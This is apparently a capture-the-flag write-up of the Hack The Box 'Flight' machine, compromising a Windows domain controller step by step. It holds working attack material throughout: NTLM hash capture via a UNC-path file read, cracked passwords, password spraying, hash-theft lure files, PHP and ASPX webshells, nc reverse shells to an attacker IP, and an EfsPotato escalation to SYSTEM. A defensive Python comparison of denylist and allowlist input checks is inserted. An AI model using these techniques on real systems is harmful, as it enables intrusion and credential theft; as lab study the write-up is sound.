Port Scan

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ sudo nmap --min-rate=10000 -T4 -p- 10.10.11.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-20 16:18 CST
Nmap scan report for 10.10.11.187
Host is up (0.28s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49694/tcp open unknown
49720/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 34.65 seconds

LFI+NTLMv2

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)

Got the domain name flight.htb; add it to hosts.

Neither SMB nor LDAP could be enumerated with what we have so far.

Surprisingly, port 80 is open as well. It serves a web page that looks like a portal site, but it does not seem to have any real functionality.

Scan for subdomains:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://flight.htb/' -H "HOST:FUZZ.flight.htb" -fs 7069

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://flight.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.flight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 7069
________________________________________________

school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 122ms]

Add the subdomain to hosts and visit it: it is a different page. Pages are loaded through a view parameter that fetches static files, and including index.php through it dumps the whole source:

<?php

ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);

if(isset($_GET['view'])){
    $file=$_GET['view'];
    if ((strpos(urldecode($_GET['view']),'..')!==false)||
        (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
        (strpos(urldecode($_GET['view']),'\\')!==false)||
        (strpos(urldecode($_GET['view']),'htaccess')!==false)||
        (strpos(urldecode($_GET['view']),'.shtml')!==false)
    ){
        echo "<h1>Suspicious Activity Blocked!";
        echo "<h3>Incident will be reported</h3>\r\n";
    }else{
        echo file_get_contents($_GET['view']);
    }
}else{
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}

I originally wanted to try remote file inclusion, but this is only file_get_contents(), which will not execute a remote script. It can, however, be pointed at our host so that the web server issues an SMB request to us and goes through an NTLM challenge. Start an SMB server locally; although \\ is filtered, // is not.
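The checks in index.php are a denylist, and the gap just described is what the rest of this section relies on: a backslash is rejected, the forward-slash UNC form is not, and a plain index.php is not rejected either. As an added example (not the box's code and not a drop-in replacement for it), the Python below models the PHP checks beside an allowlist resolver and runs both over the same inputs; the equivalent PHP fix is to accept only a bare page name and resolve it with realpath() under the document root. The temporary directory and the two files in it are constructed for the demo.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path
from typing import Dict, Optional
from urllib.parse import unquote_plus


def legacy_denylist_blocks(view: str) -> bool:
    """Python port of the substring checks in index.php above.

    PHP's urldecode() also turns '+' into a space, hence unquote_plus().
    Returns True when the original code would print "Suspicious Activity
    Blocked!" instead of calling file_get_contents().
    """
    decoded = unquote_plus(view)
    return (
        ".." in decoded
        or "filter" in unquote_plus(view.lower())
        or "\\" in decoded
        or "htaccess" in decoded
        or ".shtml" in decoded
    )


# Allowlist: one bare page name with a fixed extension. A scheme (php://),
# a slash in either direction or percent-encoding cannot match this.
VIEW_NAME = re.compile(r"[A-Za-z0-9_-]+\.html")


def allowlist_resolve(view: str, root: Path) -> Optional[Path]:
    """Return the file to serve, or None unless the request names a plain
    page that exists directly inside the document root."""
    if VIEW_NAME.fullmatch(view) is None:
        return None
    root = root.resolve()
    candidate = (root / view).resolve()
    # Second, independent check: the resolved file must be a direct child of
    # the root, so a later relaxation of the regex cannot reopen traversal.
    if candidate.parent != root or not candidate.is_file():
        return None
    return candidate


def build_demo_root() -> Path:
    """Constructed stand-in for C:\\xampp\\htdocs\\school.flight.htb."""
    root = Path(tempfile.mkdtemp(prefix="school-"))
    (root / "home.html").write_text("<h1>home</h1>\n")
    (root / "index.php").write_text("<?php // must never be served as text\n")
    return root


def compare(root: Path) -> Dict[str, Dict[str, object]]:
    """Run both strategies over the inputs that matter in this writeup."""
    samples = {
        "home.html": "legitimate page",
        "index.php": "source disclosure: the view that dumped index.php",
        "//10.10.14.15/share/1": "UNC path with forward slashes: the NTLM leak",
        "../home.html": "traversal, a case the denylist does catch",
    }
    results: Dict[str, Dict[str, object]] = {}
    for view, note in samples.items():
        results[view] = {
            "note": note,
            "denylist_blocks": legacy_denylist_blocks(view),
            "allowlist_serves": allowlist_resolve(view, root) is not None,
        }
    return results


if __name__ == "__main__":
    for view, r in compare(build_demo_root()).items():
        print(f"{view!r:26} denylist blocks={r['denylist_blocks']!s:5} "
              f"allowlist serves={r['allowlist_serves']!s:5}  {r['note']}")
```

Run it and the table shows the asymmetry: the denylist lets both index.php and the forward-slash UNC path through to file_get_contents(), while the allowlist serves home.html and nothing else. Blocking known-bad substrings is a losing game because the set of ways to spell a path is open-ended; naming the files you intend to serve is not.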

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ smbserver.py share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ curl "http://school.flight.htb/index.php?view=//10.10.14.15/share/1"
┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ smbserver.py share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.187,50392)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:a0a010f969e3cb5c25bf8800512d2ab6:0101000000000000004e72a65b0bdb014525b70533deb1950000000001001000580066006f004d00610041006400410003001000580066006f004d006100410064004100020010004f005500630066006e00730065006200040010004f005500630066006e0073006500620007000800004e72a65b0bdb0106000400020000000800300030000000000000000000000000300000232c68f33f1ae9544d8047fed8b9ee50ae5020c6f1a794c55abb3f878d68df9f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Closing down connection (10.10.11.187,50392)
[*] Remaining connections []
[*] Incoming connection (10.10.11.187,50393)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:3fb9882cf14cdb9bfb750a331aebc848:010100000000000080e40aa75b0bdb012777c8b2ee34020d0000000001001000580066006f004d00610041006400410003001000580066006f004d006100410064004100020010004f005500630066006e00730065006200040010004f005500630066006e007300650062000700080080e40aa75b0bdb0106000400020000000800300030000000000000000000000000300000232c68f33f1ae9544d8047fed8b9ee50ae5020c6f1a794c55abb3f878d68df9f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Closing down connection (10.10.11.187,50393)
[*] Remaining connections []
[*] Incoming connection (10.10.11.187,50394)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:c1e140d4ced3257d1a22c6cd0b7dc149:010100000000000080e40aa75b0bdb0199ebb5b861b47f810000000001001000580066006f004d00610041006400410003001000580066006f004d006100410064004100020010004f005500630066006e00730065006200040010004f005500630066006e007300650062000700080080e40aa75b0bdb0106000400020000000800300030000000000000000000000000300000232c68f33f1ae9544d8047fed8b9ee50ae5020c6f1a794c55abb3f878d68df9f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Closing down connection (10.10.11.187,50394)
[*] Remaining connections []

Pick any one of the captured responses and crack it:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13 (svc_apache)
1g 0:00:00:04 DONE (2024-09-20 20:51) 0.2500g/s 2665Kp/s 2665Kc/s 2665KC/s SADSAF..S4210430
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

svc_apache:S@Ss!K@*t13 works for SMB access:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
<SNIP>
[+] IP: 10.10.11.187:445 Name: flight.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Web READ ONLY

I went through every share but found nothing useful. Now that we have a set of credentials, we can enumerate further:

┌──(mikannse㉿kali)-[~/HTB/flight/smb_USER]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@10.10.11.187 >sid
┌──(mikannse㉿kali)-[~/HTB/flight/smb_USER]
└─$ cat sid |grep SidTypeUser |cut -d "\\" -f2 |cut -d " " -f1 >username

Check for password reuse:

┌──(mikannse㉿kali)-[~/HTB/flight/smb_USER]
└─$ crackmapexec smb 10.10.11.187 -u username -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE

The S.Moon user is using this password too, but still has no WinRM access, so continue enumerating over SMB:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187 -u 'S.Moon' -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ

However, this user has write permission on the Shared share, which looks like a folder shared by all users, so it is very likely that other users access it.

This tool generates files that can be used to steal NTLM hashes: https://github.com/Greenwolf/ntlm_theft.git

Generate every format, specifying the SMB server IP and the file name:

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft]
└─$ python ntlm_theft.py -g all -s 10.10.14.15 -f hacker
Created: hacker/hacker.scf (BROWSE TO FOLDER)
Created: hacker/hacker-(url).url (BROWSE TO FOLDER)
Created: hacker/hacker-(icon).url (BROWSE TO FOLDER)
Created: hacker/hacker.lnk (BROWSE TO FOLDER)
Created: hacker/hacker.rtf (OPEN)
Created: hacker/hacker-(stylesheet).xml (OPEN)
Created: hacker/hacker-(fulldocx).xml (OPEN)
Created: hacker/hacker.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: hacker/hacker-(includepicture).docx (OPEN)
Created: hacker/hacker-(remotetemplate).docx (OPEN)
Created: hacker/hacker-(frameset).docx (OPEN)
Created: hacker/hacker-(externalcell).xlsx (OPEN)
Created: hacker/hacker.wax (OPEN)
Created: hacker/hacker.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: hacker/hacker.asx (OPEN)
Created: hacker/hacker.jnlp (OPEN)
Created: hacker/hacker.application (DOWNLOAD AND OPEN)
Created: hacker/hacker.pdf (OPEN AND ALLOW)
Created: hacker/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: hacker/Autorun.inf (BROWSE TO FOLDER)
Created: hacker/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Start the SMB server locally and upload all the generated files:

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft/hacker]
└─$ smbclient //10.10.11.187/Shared -U 'S.Moon'
Password for [WORKGROUP\S.Moon]:
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> mput *
putting file desktop.ini as \desktop.ini (0.2 kb/s) (average 0.2 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \hacker.asx
NT_STATUS_ACCESS_DENIED opening remote file \hacker.m3u
NT_STATUS_ACCESS_DENIED opening remote file \hacker.htm
NT_STATUS_ACCESS_DENIED opening remote file \hacker.rtf
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \hacker.lnk
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \hacker.wax
putting file hacker.application as \hacker.application (8.0 kb/s) (average 4.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \hacker.pdf
NT_STATUS_ACCESS_DENIED opening remote file \hacker.scf
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(remotetemplate).docx
putting file hacker.jnlp as \hacker.jnlp (0.9 kb/s) (average 3.0 kb/s)
putting file hacker-(fulldocx).xml as \hacker-(fulldocx).xml (205.5 kb/s) (average 75.9 kb/s)
putting file hacker-(stylesheet).xml as \hacker-(stylesheet).xml (0.8 kb/s) (average 62.7 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \hacker-(externalcell).xlsx

Got the hash of the c.bum user, heh.

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)
1g 0:00:00:03 DONE (2024-09-20 21:30) 0.2702g/s 2847Kp/s 2847Kc/s 2847KC/s TinyMite1..Tiffani1432
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Ugh, still no WinRM access; continue SMB enumeration.

Foothold

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ crackmapexec smb 10.10.11.187 -u 'c.bum' -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE

This user has write permission on the Web share, so basically it is a matter of writing a webshell to get a reverse shell.

Write a one-line PHP webshell and upload it to the school virtual host:

<?php system($_GET['cmd']); ?>
┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ curl "http://school.flight.htb/shell.php?cmd=whoami"
flight\svc_apache

Upload an nc.exe for the reverse shell:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ curl "http://school.flight.htb/shell.php?cmd=nc%2Eexe%20%2De%20cmd%2Eexe%2010%2E10%2E14%2E15%20443"

Got a shell as flight\svc_apache, but it does not seem to lead anywhere; the account has no privileges at all. However, we already have c.bum's credentials, and that user has a profile in the Users directory. How do we get a shell as that user without remote logon rights? Use runas, roughly the equivalent of sudo on Linux:

https://github.com/antonioCoco/RunasCs

Upload it over SMB and use it to spawn another reverse shell as c.bum. But when uploaded to the web directory it simply vanished; it was presumably killed by AV.

After I created a folder in the root of the drive, however, files downloaded into it were not killed:

C:\test>.\r.exe c.bum Tikkycoll_431012284 -r 10.10.14.15:444 cmd
.\r.exe c.bum Tikkycoll_431012284 -r 10.10.14.15:444 cmd
[*] Warning: The logon for user 'c.bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-6ca84$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 4784 created in background.

Privilege Escalation

Now we have a shell as c.bum, but this user has no special privileges either. There is, however, a port 8000 listening locally:

C:\Users\C.Bum\Desktop>netstat -ano | findstr LISTENING
netstat -ano | findstr LISTENING
<SNIP>
TCP [::]:3269 [::]:0 LISTENING 644
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8000 [::]:0 LISTENING 4
<SNIP>

There is also an inetpub directory in the root of the drive:

C:\inetpub>icacls *
icacls *
custerr BUILTIN\Users:(RX)
BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

development flight\C.Bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

history: Access is denied.
Successfully processed 2 files; Failed processing 1 files

c.bum has full rights on the development directory, meaning files can be written there. To reach this web service, first set up a remote port forward by uploading chisel.

Start the server locally first:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ ./chisel server -p 10000 --reverse
2024/09/20 22:18:46 server: Reverse tunnelling enabled
2024/09/20 22:18:46 server: Fingerprint 9nPsGGD5rO4jhOjQvY0xTcwWu1XvXW0z+BZvVwwhEL4=
2024/09/20 22:18:46 server: Listening on http://0.0.0.0:10000
C:\test>.\chisel.exe client 10.10.14.15:10000 R:20000:127.0.0.1:8000
.\chisel.exe client 10.10.14.15:10000 R:20000:127.0.0.1:8000
2024/09/20 14:10:15 client: Connecting to ws://10.10.14.15:10000
2024/09/20 14:10:15 client: Connected (Latency 68.0988ms)

Visiting the site, it looks like it is served from that development directory, so try uploading a webshell. It runs on IIS, so it needs to be ASPX; use the one that ships with Kali:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
C:\inetpub\development>powershell -c wget http://10.10.14.15:8000/cmdasp.aspx -o cmd.aspx
powershell -c wget http://10.10.14.15:8000/cmdasp.aspx -o cmd.aspx

Tried to use nc for a reverse shell, but frustratingly cmd.aspx was killed; the page returned: The resource cannot be found.

A few AV-evasion attempts were killed as well, so just use a plain reverse shell payload:

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=446 -a x64 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3421 bytes

Hmm, still no luck. It turned out the web service had crashed rather than the file being killed; after resetting the box, the reverse shell came through. Not easy.

┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ rlwrap -cAr nc -lvnp 446
listening on [any] 446 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.187] 49778
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

A shell obtained through IIS almost always has SeImpersonatePrivilege, so try PrintSpoofer, but it failed:

C:\test>.\print.exe -i -c cmd
.\print.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

So use EfsPotato instead: upload the source, compile it with csc, then run nc through it for a reverse shell:

C:\test>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618
Microsoft (R) Visual C# Compiler version 4.7.3190.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

C:\test>EfsPotato.exe whoami
EfsPotato.exe whoami
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: IIS APPPOOL\DefaultAppPool
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=1046120)
[+] Get Token: 876
[!] process with pid: 5056 created.
==============================
nt authority\system

C:\test>EfsPotato.exe "nc.exe -e cmd.exe 10.10.14.15 443"
EfsPotato.exe "nc.exe -e cmd.exe 10.10.14.15 443"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: IIS APPPOOL\DefaultAppPool
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=85fdd0)
[+] Get Token: 852
[!] process with pid: 1164 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818
┌──(mikannse㉿kali)-[~/HTB/flight]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.187] 49818
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\test>whoami
whoami
nt authority\system

Closing Thoughts

A really long path for this box; I lost count of how many users we moved through laterally, but the takeaways are big: triggering NTLM challenges several times to capture hashes and crack them, writing a webshell through a writable SMB share, and a final privilege escalation that is by now very familiar. Thanks to THM for that technique!